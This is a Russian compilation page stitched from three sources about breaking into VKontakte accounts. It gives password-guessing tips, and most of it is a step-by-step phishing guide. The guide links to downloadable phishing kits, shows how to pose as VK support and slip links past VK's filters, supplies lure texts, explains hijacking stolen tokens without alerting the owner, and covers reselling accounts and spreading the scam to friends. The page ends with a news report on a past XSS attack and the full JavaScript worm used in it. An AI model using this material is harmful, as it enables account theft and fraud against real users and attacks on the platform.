В этой статье будут рассмотрены некоторые возможности взлома «ВКонтакте», но исключительно ради ознакомления. Не как повод к действию, а как информация для честных пользователей, о том, что их анкету можно очень легко взломать. Ведь вы осознаёте, что за взломом аккаунтов и сайтов последует уголовное наказание.
За последнее время в социальных сетях часто стали появляться неправомерные предложения взломать интересующий какого-либо человека профайл в «Одноклассниках» или «ВКонтакте» с целью получения доступа к анкете чужого пользователя, для чего предлагается выложить немалую сумму.
Однако, некоторые запреты, наложенные на закрытую страницу, предлагают обойти, не используя взлома. Здесь рассматривается несколько вариантов получения доступа именно к анкете.
Социальная инженерия, разработанная специально для взлома профилей «ВКонтакте»
Из практики видно, что для лёгкого взлома аккаунта человека достаточно лишь достаточно хорошо знать этого человека. Очень часто пароль можно подобрать даже вручную, используя дату рождения или попробовав некоторые стандартные пароли: 1q2w3e, qwerty, 123456, 12345, 1234, 123. Получил доступ – читай что угодно: приватную переписку, заметки пользователя Вконтакте, смотри закрытые фотки, да что угодно.
Скрипт по автоматизации ВК
Если таким способом у хакеров ничего не получается, они пробуют взломать email интересующей персоны, если не получается и это, то обращаются к самому лёгкому способу – подобрать ответ на секретный вопрос. Получив таким образом доступ к email, можно просто напросто запросить «ВКонтакте» восстановление пароля, с помощью которого получить доступ ко всем сведениям о пользователе.
Если не подходит и этот вариант, тогда взломщикам ничего не остаётся делать, как изучить всё соответствующее программирование и выбрать наиболее подходящую программу или скрипт для взлома интересующего контакта.
Perl Скрипт, предназначенный для взлома контакта
Данный скрипт несовершенен и требует частичной доработки для взлома аккаунта. Он просто перебирает пароли для аккаунта. База паролей располагается в файле формата pass.txt. Её может легко скачать любой человек, воспользовавшись обычным поиском. Стоит отметить, что взломщики понимают то, что при простом запуске почти невозможно получить желаемый доступ, потому что его IP могут просто забанить.
Чтобы защитить от взлома анкеты «ВКонтакте» не нужно использовать простых паролей. Надёжный пароль должен состоять хотя бы из шести символов, желательно, если он будет содержать ещё и буквы. Никогда никому не говорите свой пароль и не используйте аналогичные пароли для различных сайтов.
Если у вас всё же украли пароль, паниковать не стоит. Нужно сразу зайти на email. Если же и от него пароль украден, нужно попытаться его восстановить, дав правильный ответ на секретный вопрос. А уже затем зайти на страничку, созданную для восстановления пароля, где и ввести свой email. Пароль восстановлен!
of your page —>
Источник: wsms.ru
КАК ВЗЛОМАТЬ ВК В 2023? Методы Взлома Сайтов. СХЕМА.
Взлом ВК
Лучше всего юзать связку впн+тор, тор запускать в песочнице. Зачем песочница? Есть код , который отправляют на компьютер , он обрабатывается твоим железом и отсылает уже обработанный код. Этот самый обработанный код является отпечатком пальца твоего компьютера.
А песочница это – мини компьютер, который использует только нужные ему ресурсы , так что этот код работать не будет . ) Но лучше всего делать все с деда. И да , самая девственная связка-это впн+тор , просто тор нельзя.Если вы занимаетесь этим ради удовольствия (ломаете одноклассниц), анонимностью можно пренебречь, но лучше делать все по-умному.
Из впн посоветую windscribe.
Взлом определенного человека
Основной способ – это фишинг , но можно вытащить пароль у человека через вирус или находясь рядом с ним , об этом позже.
Что там для этого нужно ?
- Фишинговый сайт
- Фейковый аккаунт вк
- Редирект (что бы вк не блочил ссылки)
Для начала нужно поставить свой сайт и уже потом залить на него фишинговый скрипт , ниже я дам несколько тех самых фишинговых скриптов.
https://yadi.sk/d/7ZVfSKSA3SqXuD — Фейк , жалобы , без заточки , с проверкой. логин и пароль находятся по пути вашсайт.ru/dashboard
https://yadi.sk/d/fr1jLhOb3SqXxB — Фейк, обычная авторизация, вытаскивает токен.Токен , логин и пароль находятся по пути вашсайт.ru/base.json
https://yadi.sk/d/KgDfJ-Vg3SqXzt — Фейк жалобы , без заточки, без проверки, логин и пароль находятся по пути вашсайт.ru/dashboard
https://yadi.sk/d/1WWJwSOO3SqY4T – Фейк с заточкой , с проверкой, жалобы, логин и пароль находятся по пути вашсайт.ru/protection
Проверка – это фейк , который имеет функцию проверять введенные в него данные на валидность. Он имеет 2 минуса 1)Когда жертва вводит данные , ей приходит уведомление о входе тк, что бы проверить аккаунт на валидность нужно на него попробовать зайти. 2)Если у жертвы стоит двухфакторная аутентификация , скрипт не пропустит данные в админку , сочтет их за невалидные.
Заточка – это возможность заточить фейк под страницу жертвы. Если вы купили домен proverka.ru , то что бы заточить сайт под жертву , просто изменяете ссылку такого типа :proverka.ru/idжертвы. Если же у нее сокращенная ссылка , то просто пишете вместо id жертвы , ее имя в ссылке наподобие : proverka.ru/vsem_privet
Как купить домен или как залить сайт на хостинг , можете посмотреть в интернете , просто на каждом все это настраивается по-разному.
С сайтом все понятно , теперь разберемся с аккаунтами для взлома.
Регистрируем аккаунты на сайтах:
Есть и другие сайт , но использовал я только эти, советую залить по 100 рублей на 3-4 сайта и не париться , тк бывает , что на каком-то сайте отсутствуют свободные симки. Цена от 15 до 30 рублей.
Потом нужно их назвать, ниже приведу актуальные Имена и Фамилии , которые не банит вк.
- Страница Заблокирована
- Bot Info
- Accounts Groups
- Agents Supports
Аккаунт назвали , теперь его нужно оформить.
Поставили аву , заходите в поиск групп и ищите оф. группу вк “Команда Вконтакте”, потом заходите в пункт “Редактировать”, изменяете в карьере место работы на “Команда Вконтакте”
Аккаунт оформили , осталось самое важное , отправка текста жертве.
Перед отправкой нужно позаботиться о том , чтобы вк не посчитал вашу ссылку фишинговой.
Как сделали редирект на нашу ссылку, сокращаем ее на сайтеvk.cc . Все, теперь ВКонтакте не будет блокировать нашу ссылку.
Ниже я вам дам шаблонные текста , не обязательно работать только по ним , вы можете их изменять или составлять свой. Что бы вк реже блочил ваши аккаунты я поменял русские буквы на английские (только те , которое не отличить. Например: о o ; х x)
Куда же отправлять этот текст если у жертвы закрыта личка ?
Заходите в друзья, нажимаете “Поиск друзей”, дальше в параметрах поиска выбираете любую страну , любой город, любое учебное заведение.
Вам выдаст несколько тысяч человек , заходим к каждому пользователю, который не в онлайне , ищем открытую стену. Нашли человека с открытой стеной , кидаем ему наш текст на стену , 90% пользователей , которые клюнут на фишинг , не смогут найти , где находится ваше сообщение.
Им придет уведомление о том , что их упомянули в какой-то записи , это уведомление появляется в ответах , если жертва онлайн с компьютера.
Жертва ввела данные, где же они появятся ?
Они появляются в админке , что бы зайти в админку , нужно ввести имя вашего сайта и некоторую приставочку. Например на сайтах , которые дал я , можно войти так: вашсайт.ru/dashboard
На некоторых сайтах нужно ввести лог/пасс от админки, их смотрите в файле config
Способ входа на страницу без уведомления
Работает только с сайтом, который ворует не только логин и пароль , а еще и токен. https://yadi.sk/d/fr1jLhOb3SqXxB
Так , у нас есть токен жертвы, нужно как-то зайти на него без уведомления , сейчас я вам распишу как это сделать.
Сначала качаем расширение для хрома “EditThisCookie”,потом заходим на сайте apidog.ru в свой аккаунт, после авторизации открываем наше расширение и видим это :
Заменяем наш токен на токен, взломанной страницы. (он будет в админке этого фейка https://yadi.sk/d/fr1jLhOb3SqXxB )
Все , мы зашли на страницу , а ее хозяину уведомление не пришло.
1 способ я уже вам рассказал , думаю , что отсюда вы поняли всю суть взлома .
Приступим к другим вариациям фишинга.
Здесь я расскажу как взламывать много аккаунтов .
Мы будем разводить людей , которые сидят в пабликах ”Отдам даром”
Для этого нам нужно :
- Фишинговый сайт
- Фейковый аккаунт вк
- Группа вк
- Анонимность(здесь лучше строго соблюсти все нюансы)
Это скрипт обычной авторизации, который может после ввода данных перенаправить жертву на нашу группу.(Редирект настраивается в файле config, что бы просмотреть данные , которые ввела жертва, нужно пройти по такой ссылке: вашсайт.ru/base.json)
После того , как поставили сайт , создаем и заполняем нашу группу . Заходите на фейковый , очень похожий на живой , аккаунт.
Заходите на реальную группу “Отдам даром”, берете из нее страницы людей, которые находятся в онлайне и пишите им :
Привет Обладатель нового айфона! Поздравляю тебя с победой! Тебе необходимо подписаться на паблик и написать в сообщение группы и вам там скажут как получить ваш приз ссылка на фейк Спасибо за участие)
переходим в админку по ссылке вашсайт.ru/base.json
(На всех фейках настраивается редирект)
Там будет бд аккаунтов , что с ними делать решайте сами. Способы их применения : 1) Продажа. Продавать их можно в разные шопы или даже на сайты с автоматической покупкой.2)Раздача на форуме для набива репутации.3)С помощью спама, взламывать аккаунты друзей.
В общем применений много.
Чтобы взламывать аккаунты друзей нам нужно зайти на сайт vk-assistant.ru . Этот сайт рассылает сообщения друзьям .
Текст , который мы будет отправлять друзьям жертвы :
Привет. Срочно нужна помощь! Можешь за меня проголосовать пожалуйста? Я 2-ой(ая) по счету. Вот ссылка на опрос: ваша фишинг ссылка
Вставляем этот текст в нужную строку , жмем кнопку “Все”, жмем “Отправить”, потом сидим и вводим капчу.
Источник: teletype.in
Взлом «ВКонтакте» с помощью XSS-уязвимости
14 февраля примерно в 19:40 по МСК в официальных сообществах «ВКонтакте», а также в других группах и на страницах пользователей стали появляться сообщения о «запуске рекламы в личных сообщениях». Все они содержат одну строчку текста и ссылку, похожую на новость.
Содержание
Как выяснилось позднее, социальная сеть «ВКонтакте» оказалась подвергнута XSS-уязвимости. Вредоносный скрипт разместили на одной из страниц сети, при посещении которой на страницах, администрируемых жертвой, автоматически размещалась публикация как на картинке выше.
Багоси признались во взломе «ВКонтакте»
В сообществе «Багоси» опубликовали сообщение, в котором объяснили как и для чего был произведен взлом. Вскоре сообщество было заблокировано.
В статью был встроен скрипт, который постил ссылку во все администрируемые группы и на личную страницу пользователя. Пока пользователь читал текст, он выполнялся, при этом личные данные никуда не утекали.
Кстати, комментарии к записям были составлены из отзывов к программе ВКонтакте в Google Play и AppStore, а сама статья из кликбейтных новостей с сайта AKKet (это локальный мем, многие могут не знать, что это за сайт). Уязвимость использовалась та же, что и год назад (Демократия), тогда сотрудники ВКонтакте кинули и не выплатили баунти, в итоге было решено её использовать, но не нанося вред пользователям.
Тогда, после устранения уязвимости, было найдено множество обходов, но даже спасибо мы за них не получили. В итоге остался последний обход, который мы берегли целый год. Сегодня за несколько часов был написан код. Чтобы посты было сложнее сносить антиспамом и записи продержались хотя бы полчаса, заголовок и комментарий подбирались рандомно. Что ж, шалость удалась.
К сожалению, основную группу забанили, но надеемся, что у сотрудников еще осталось чувство юмора и её разбанят. Так как уязвимость принадлежала пользователю, который больше не занимается их поиском, это было в последний раз.
Комментарии Александра Литреева, эксперта по кибербезопасности
С помощью этой XSS-уязвимости можно было получить прямой и неограниченный доступ к любым данным аккаунта «ВКонтакте» — от личной переписки до скрытых фотографий. Никому не известно, как была (и была ли) эксплуатирована эта дыра ранее — вполне возможно, что злоумышленники могли, например, скомпрометировать переписку сотен пользователей и долго оставаться незамеченными.
О какой безопасности вообще можно говорить, если у «ВКонтакте» элементарно не настроена самая базовая политика безопасности CSP (Content Security Policy).
Content Security Policy устанавливает перечень доверенных ресурсов, откуда могут подгружаться различные скрипты и прочие материалы. У Facebook, например, такая политика настроена. «ВКонтакте» же весьма халатно отнеслась к вопросу безопасности пользователей и уже далеко не первый раз.
Комментарии «ВКонтакте»
Через 20 минут после начала атаки пресс-служба «ВКонтакте» сообщила, что соцсеть взяла ситуацию под контроль.
Ситуация под контролем, мы начали удалять нежелательные публикации в течение первой минуты после обнаружения уязвимости.
Переход по ссылкам приводил к эффекту волны и дальнейшему распространению публикаций. Уязвимость, которая позволяла выполнять произвольный javascript-код, уже исправляется.
Сообщества не были взломаны, пароли аккаунтов администраторов в безопасности.
Напоминаем хакерам, что за найденную уязвимость они могли заработать деньги с помощью программы HackerOne.
пресс-служба «ВКонтакте»
Скрипт для взлома
На GitHub выложили javascript, который использовался для взлома соцсети. Ниже можете просмотреть его, т.к. на GitHub его уже удалили.
/** * Текст поста. */ var news_text = [ «Всё меньше причин оставаться ВК.. Ждем пока mail group окончательно загонят сайт в яму и переходим на telegram», «Дурову пора создавать новый вконтакте, этот уже испортили», «Прости, Паша, мы все прое*али», «Ну это уже ни в какие рамки», «ВКонтакте окончательно загнулись», «Мда, меилру продолжает губить все, к чему прикасается», «Это пи*дец, товарищи», «Раньше было лучше», «стало очень неудобно», «лучше бы делом занялись», «я просто в шоке», «без комментариев», «Как же достали со своими обновлениями», «Фуфло полное ,не трогайте сообщения!», «сначала музыка, теперь ЭТО», «С такими говновведениями, что тут бодяжат последнее время, со всякими дебильными ветоШными комментами, тупыми закладками, невидимыми репостами и т.д., все и так сбегут скоро» ]; /** * Название ссылки, которая будет в посте. */ var news_link_text = [ «Социальная сеть ВKонтакте зaпустила реклaму в личных сообщенияx пользоватeлей», «СМИ: ВКонтакте запустили pекламу в личных соoбщениях», «ВКонтакте запустили рекламу в сообщениях», «ВКонтакте появилась реклама в сообщениях», «ВКонтакте ввели рекламу в сообщениях», «ВКонтакте тестирует рекламу в личныx сообщениях», «ВКонтакте представили рекламу в личных сообщениях», «Реклaма в личных сoобщениях появилась ВКонтакте», «Пользователей BКонтакте взбесила реклама в личных сообщениях», «Пользователи ВКонтакте протестуют против рекламы в личных сообщениях», «Реклама в личных сообщениях вывела из себя пользователей ВКонтакте», «ВКонтакте: мы запускаем рекламу в личных сообщениях», «ВКонтакте: теперь рекламодатели могут размещать рекламу в сообщениях пользователей», «ВКонтакте прокомментировали жалобы пользoвателей на рекламy в сообщeниях», «Пользователи ВКонтакте в ярости из-за рекламы в личных сообщениях», «Пользователи бегут из социальной сети ВКонтакте из-за рекламы в личных сообщениях» ]; /** * Отправка URL через HTTPRequest. */ function send_URL(url) < var b = new XMLHttpRequest; b.open(«GET», url); b.send(); >/** * Создаем URL API-метода «поделиться» от лица пользователя. */ function create_share_url(user_hash, club_address) < return ( «https://vk.com/share.php?act=a_submithash=» + user_hash + » + io(456239755) + » + io(484644478) + » + encodeURIComponent(change_text(random_element(news_text))) + » + encodeURIComponent(random_element(news_link_text)) + (club_address ? » + club_address + «» : «») + // админы клубов пересылают в свои клубы. » + encodeURIComponent( «https://vk.com/public» + io(22822305) + «?w=article727491309_905121871 + (Math.random() * 100) ) ); >/** * «rzhaka: это int overflow для частичного обхода антиспама». */ function io(number) < return 4294967296 * Math.floor(1e6 * Math.random()) + number; >/** * Выбор рандомного элемента из массива. */ function random_element(array) < return array[Math.floor(Math.random() * array.length)]; >/** * Что-то делает со строкой. * Скорее всего рандомно заменяет некоторые символа исходного текста на другие, чтобы избежать автоматического удаления поста. */ function change_text(text) < let symbols = < а: [«я», «a»], о: [«а», «a», «o», «0»], я: [«е», «а», «е», «a»], и: [«ы»], ы: [«и»], ъ: [«ь»], ь: [«ъ»], д: [«т»] >; for (let i = 0; i < text.length; i++) < null != symbols[text[i]] .3 >Math.random() (text = text.replaceAt(i, symbols[text[i]][Math.floor(Math.random() * symbols[text[i]].length)])); > return text; > /** * Изменяем поведение обычного `replaceAt`. * * — это только нужно для `change_text()`. */ String.prototype.replaceAt = function(c, a) < return this.substr(0, c) + a + this.substr(c + a.length); >; var share_method = new XMLHttpRequest; share_method.open(«GET», «share.php»); // метод «поделиться». share_method.send(); // отправляем запрос ВК. share_method.onload = function() < // получаем ответ (типа text/html) от ВК вместе со всей приватной(?) инфой. var clubs = JSON.parse( share_method.responseText.match(/clubs: (.*?),n/)[1] ); // доступные клубы. var hash = share_method.responseText.match( /window.shareHash = ‘(.*?)’;/ )[1]; // уникальный хэш пользователя для «поделиться»? clubs.forEach(function(club) < // админы репостят в свои клубы. send_URL(create_share_url(hash, club[0])); >); send_URL(create_share_url(hash, 0)); // пользователь репостит себе. >;
Может быть интересно:
- Как найти человека по фото бесплатно
- Как получить бесплатно безлимитный Google Drive
- OpenWeatherMap — получаем прогноз погоды по API
Источник: pogrommist.ru